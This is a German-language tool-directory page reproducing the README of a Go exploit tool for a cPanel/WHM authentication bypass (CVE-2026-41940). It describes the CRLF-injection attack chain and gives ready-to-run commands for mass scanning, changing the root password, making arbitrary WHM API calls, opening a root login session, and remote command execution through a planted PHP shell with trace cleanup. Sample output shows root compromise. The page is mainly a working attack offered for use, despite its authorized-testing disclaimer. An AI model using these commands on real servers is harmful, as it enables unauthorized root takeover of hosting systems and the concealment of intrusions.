Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cPanelWHM-AuthBypass — Go-basierter Scanner und Exploit-Tool für CVE-2026-41940, eine Authentifizierungsumgehung in cPanel/WHM. Unterstützt Batch-Scanning, Token-Leakage und Post-Exploitation-Aktionen wie RCE, Passwortänderung und API-Aufrufe. | Kitploit
Tools/GitHubGitHub/kagantua/cpanelwhm-authbypass
SchwachstellenscannerExploitationWebanwendungs-ExploitationPenetrationstestsAuthentifizierungRed Teaming
GitHubkagantua/cpanelwhm-authbypass

cPanelWHM-AuthBypass

Go-basierter Scanner und Exploit-Tool für CVE-2026-41940, eine Authentifizierungsumgehung in cPanel/WHM. Unterstützt Batch-Scanning, Token-Leakage und Post-Exploitation-Aktionen wie RCE, Passwortänderung und API-Aufrufe.

Repository anzeigen
107vor 3 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

cPanel/WHM Auth Bypass Scanner & Exploit Tool

Ein in Go geschriebenes CLI-Tool, das auf dem Python-PoC von watchTowr basiert und zur Erkennung und Ausnutzung der CVE-2026-41940 cPanel/WHM-Authentifizierungs-Bypass-Schwachstelle dient.

Schwachstellenübersicht

CVE-2026-41940 ist eine Authentifizierungs-Bypass-Schwachstelle in cPanel/WHM. Die Angriffskette nutzt eine CRLF-Injektion in den Basic-Auth-Header, um Sicherheits-Tokens zu leaken und WHM-Root-Zugriff zu erlangen.

4-Phasen-Angriffskette:

  1. Pre-Auth — Senden falscher Anmeldedaten an /login/, um das rohe whostmgrsession-Cookie zu erhalten
  2. CRLF-Injektion — Einfügen von Zeilenumbrüchen über den Authorization: Basic-Header, um den Server dazu zu bringen, das cpsess-Sicherheits-Token im Location-Header der 307-Weiterleitung zu leaken
  3. Token-Weitergabe — Auslösen von do_token_denied, um die injizierten Authentifizierungsdaten vom Rohspeicher in den Cache zu übertragen
  • Berechtigungsprüfung — Zugriff auf /json-api/version mit dem geleakten Token, um Root-Zugriff zu verifizieren
  • Funktionen

    • Batch-Scan — Massenprüfung von Zielen aus einer Datei, parallel ausgeführt
    • Einzelziel-Prüfung — Schnelle Verifizierung einer einzelnen URL
    • Intelligente URL-Verarbeitung — Automatische Kompatibilität mit http://, https://, protokollfreien Formaten, automatische Deduplizierung
    • Exploit
      • Root-Passwort ändern (-passwd)
      • Beliebige WHM-API aufrufen (-api)
      • Ein-Klick-Login-URL generieren (-session)
      • Remote-Befehlsausführung / RCE (-cmd)
    • Terminal-Hervorhebung — [VULN] rot, [SAFE] grün hervorgehoben
    • Ergebnis-Speicherung — Anfällige URLs werden automatisch in einer Datei gespeichert

    Kompilierung

    root@kitploit:~
    # Erfordert Go 1.20+
    cd cpanel-checker
    go build -o cpanel-checker .
    

    Verwendung

    Parameterübersicht

    ParameterBeschreibungBeispiel
    -uEinzelne Ziel-URL-u https://1.2.3.4:2087
    -fDatei mit URL-Liste-f targets.txt
    -oAusgabedateipfad (Standard result.txt)-o vuln.txt
    -cParallelität (Standard 10)-c 20
    -hostnameHost-Header manuell angeben (Standard: automatische Erkennung)-hostname cpanel.example.com
    -passwdRoot-Passwort ändern (nur -u-Modus)-passwd NewP@ss123
    -apiWHM-API-Funktion aufrufen (nur -u-Modus)-api listaccts
    -api-paramsWHM-API-Parameter, kommagetrennt-api-params user=root,password=123
    -sessionRoot-Ein-Klick-Login-URL generieren (nur -u-Modus)-session
    -keepTemporäres RCE-Konto behalten (in Kombination mit -cmd)-keep
    -cmdRemote-Befehl ausführen / RCE (nur -u-Modus)-cmd "id"

    1. Einzelziel-Prüfung

    root@kitploit:~
    ./cpanel-checker -u https://target:2087
    

    Der Standardport ist 2087, die folgenden Schreibweisen sind äquivalent:

    root@kitploit:~
    ./cpanel-checker -u https://target
    ./cpanel-checker -u target
    

    2. Batch-Scan

    root@kitploit:~
    ./cpanel-checker -f targets.txt -c 20
    

    targets.txt unterstützt die folgenden Formate (eine pro Zeile, # am Anfang ist ein Kommentar):

    root@kitploit:~
    https://1.1.1.1:2087
    http://2.2.2.2:2087
    3.3.3.3:2087
    4.4.4.4
    # Dies ist ein Kommentar
    
    • Automatische Deduplizierung: http://1.1.1.1 und https://1.1.1.1 gelten als dasselbe Ziel und werden nur einmal gescannt
    • Adressen ohne Protokoll werden automatisch zu https:// ergänzt
    • Adressen ohne Port verwenden automatisch 2087
    • Ergebnisse werden in result.txt gespeichert (über -o anpassbar)

    3. Root-Passwort ändern

    root@kitploit:~
    ./cpanel-checker -u https://target:2087 -passwd "NewP@ssw0rd!"
    

    4. Beliebige WHM-API aufrufen

    root@kitploit:~
    # Alle Konten auflisten
    ./cpanel-checker -u https://target:2087 -api listaccts
    
    # Mit Parametern aufrufen
    ./cpanel-checker -u https://target:2087 -api passwd -api-params "user=root,password=abc123"
    

    5. Ein-Klick-Login-URL generieren

    root@kitploit:~
    ./cpanel-checker -u https://target:2087 -session
    

    Gibt eine URL aus, die im Browser geöffnet werden kann, um direkt in das WHM-Verwaltungspanel zu gelangen. Über die Terminal-Funktion im Panel kann eine interaktive Root-Shell erhalten werden.

    Hinweis: -session ist halbautomatisch — das Tool generiert die Login-URL, die du dann manuell im Browser öffnen musst.

    6. Remote-Befehlsausführung (RCE)

    root@kitploit:~
    ./cpanel-checker -u https://target:2087 -cmd "id"
    

    Mit -keep wird das temporäre Konto behalten, um sich im cPanel-Backend anzumelden:

    root@kitploit:~
    ./cpanel-checker -u https://target:2087 -cmd "id" -keep
    

    Bei Verwendung von -keep enthält die Ausgabe Benutzername, Passwort und cPanel-Login-Adresse (https://host:2083) des temporären Kontos. Mit diesen Anmeldedaten kann man sich direkt im cPanel-Panel anmelden.

    -cmd ist vollautomatisch und erfordert keine weiteren manuellen Schritte. Interner Ablauf:

    1. Authentifizierungs-Bypass ausnutzen, um Root-Zugriff zu erlangen
    2. Temporäres cPanel-Konto über die WHM-API erstellen
    3. PHP-Shell über UAPI (Fileman::save_file_content) in ~/public_html/ schreiben
    4. Befehl über HTTP unter https://host/~tmpuser/shell.php ausführen
    5. Befehlsausgabe zurückgeben
    6. Temporäres Konto automatisch löschen (Spuren beseitigen)

    Voraussetzung: Port 80 oder 443 des Ziels muss erreichbar sein und Apache/httpd muss laufen.

    7. Kombinierte Nutzung

    Mehrere Exploit-Parameter können gleichzeitig verwendet werden:

    root@kitploit:~
    # Login-URL erhalten, Befehl ausführen und Passwort ändern
    ./cpanel-checker -u https://target:2087 -session -cmd "id" -passwd "NewP@ss123"
    

    8. Host-Header manuell angeben

    Wenn die Ziel-IP nicht mit dem in cPanel konfigurierten Hostnamen übereinstimmt, kann dieser manuell angegeben werden:

    root@kitploit:~
    ./cpanel-checker -u https://1.2.3.4:2087 -hostname cpanel.example.com
    

    Standardmäßig erkennt das Tool den korrekten Hostnamen automatisch über die 307-Weiterleitung von /openid_connect/cpanelid.

    Beispielausgabe

    Batch-Scan

    root@kitploit:~
    [1/5] [VULN] https://1.1.1.1:2087 - token=/cpsess1234567890
    [2/5] [SAFE] https://2.2.2.2:2087 - stage2: no cpsess token leaked (HTTP 301), likely patched
    [3/5] [SAFE] https://3.3.3.3:2087 - stage1: request failed: dial tcp: i/o timeout
    [4/5] [VULN] https://4.4.4.4:2087 - token=/cpsess0987654321
    [5/5] [SAFE] https://5.5.5.5:2087 - stage2: no cpsess token leaked (HTTP 301), likely patched
    
    ========== Scan abgeschlossen ==========
    Gesamt: 5 | Anfällig: 2
    
      ● https://1.1.1.1:2087
      ● https://4.4.4.4:2087
    
    [+] Ergebnisse wurden in result.txt gespeichert
    

    RCE-Ausführung

    root@kitploit:~
    [*] Ziel: https://target:2087
    [*] Modus: Exploit
    
    [0] hostname = cpanel.example.com
    [1] minting a preauth session...
        session base = abc123def456
    [2] sending the CRLF injection (Basic auth + no-ob cookie)...
        leaked token = /cpsess1234567890
    [3] firing do_token_denied to propagate raw -> cache...
        gadget fired
    [4] verifying we're WHM root...
    [+] WHM-Root-Zugriff erlangt
    
    [*] Remote-Befehl ausführen (RCE)...
        [a] Temporäres Konto erstellen: tmpabcde
        [b] Shell schreiben: /home/tmpabcde/public_html/random.php
        [c] Befehl ausführen: id
        [d] Temporäres Konto löschen: tmpabcde
    [+] Befehlsausgabe:
    uid=0(root) gid=0(root) groups=0(root)
    
    [+] Fertig. https://target:2087 wurde kompromittiert
    

    Hinweise

    • Exploit-Parameter (-passwd, -api, -session, -cmd) sind nur im -u-Einzelzielmodus verfügbar, nicht im -f-Batchmodus
    • Das Tool überspringt standardmäßig die TLS-Zertifikatsprüfung
    • Das Request-Timeout beträgt 15 Sekunden
    • Zeilen, die in der URL-Datei mit # beginnen, werden ignoriert

    Haftungsausschluss

    Dieses Tool ist ausschließlich für autorisierte Sicherheitstests und Forschungszwecke bestimmt. Das Testen von Systemen ohne Autorisierung ist illegal. Der Benutzer muss sicherstellen, dass er die ausdrückliche schriftliche Genehmigung des Eigentümers des Zielsystems erhalten hat. Der Autor übernimmt keine Verantwortung für jeglichen Missbrauch.

    Danksagung

    • Original-PoC: watchTowr / Sina Kheirkhah (@SinSinology)
    • CVE: CVE-2026-41940
    Tool herunterladen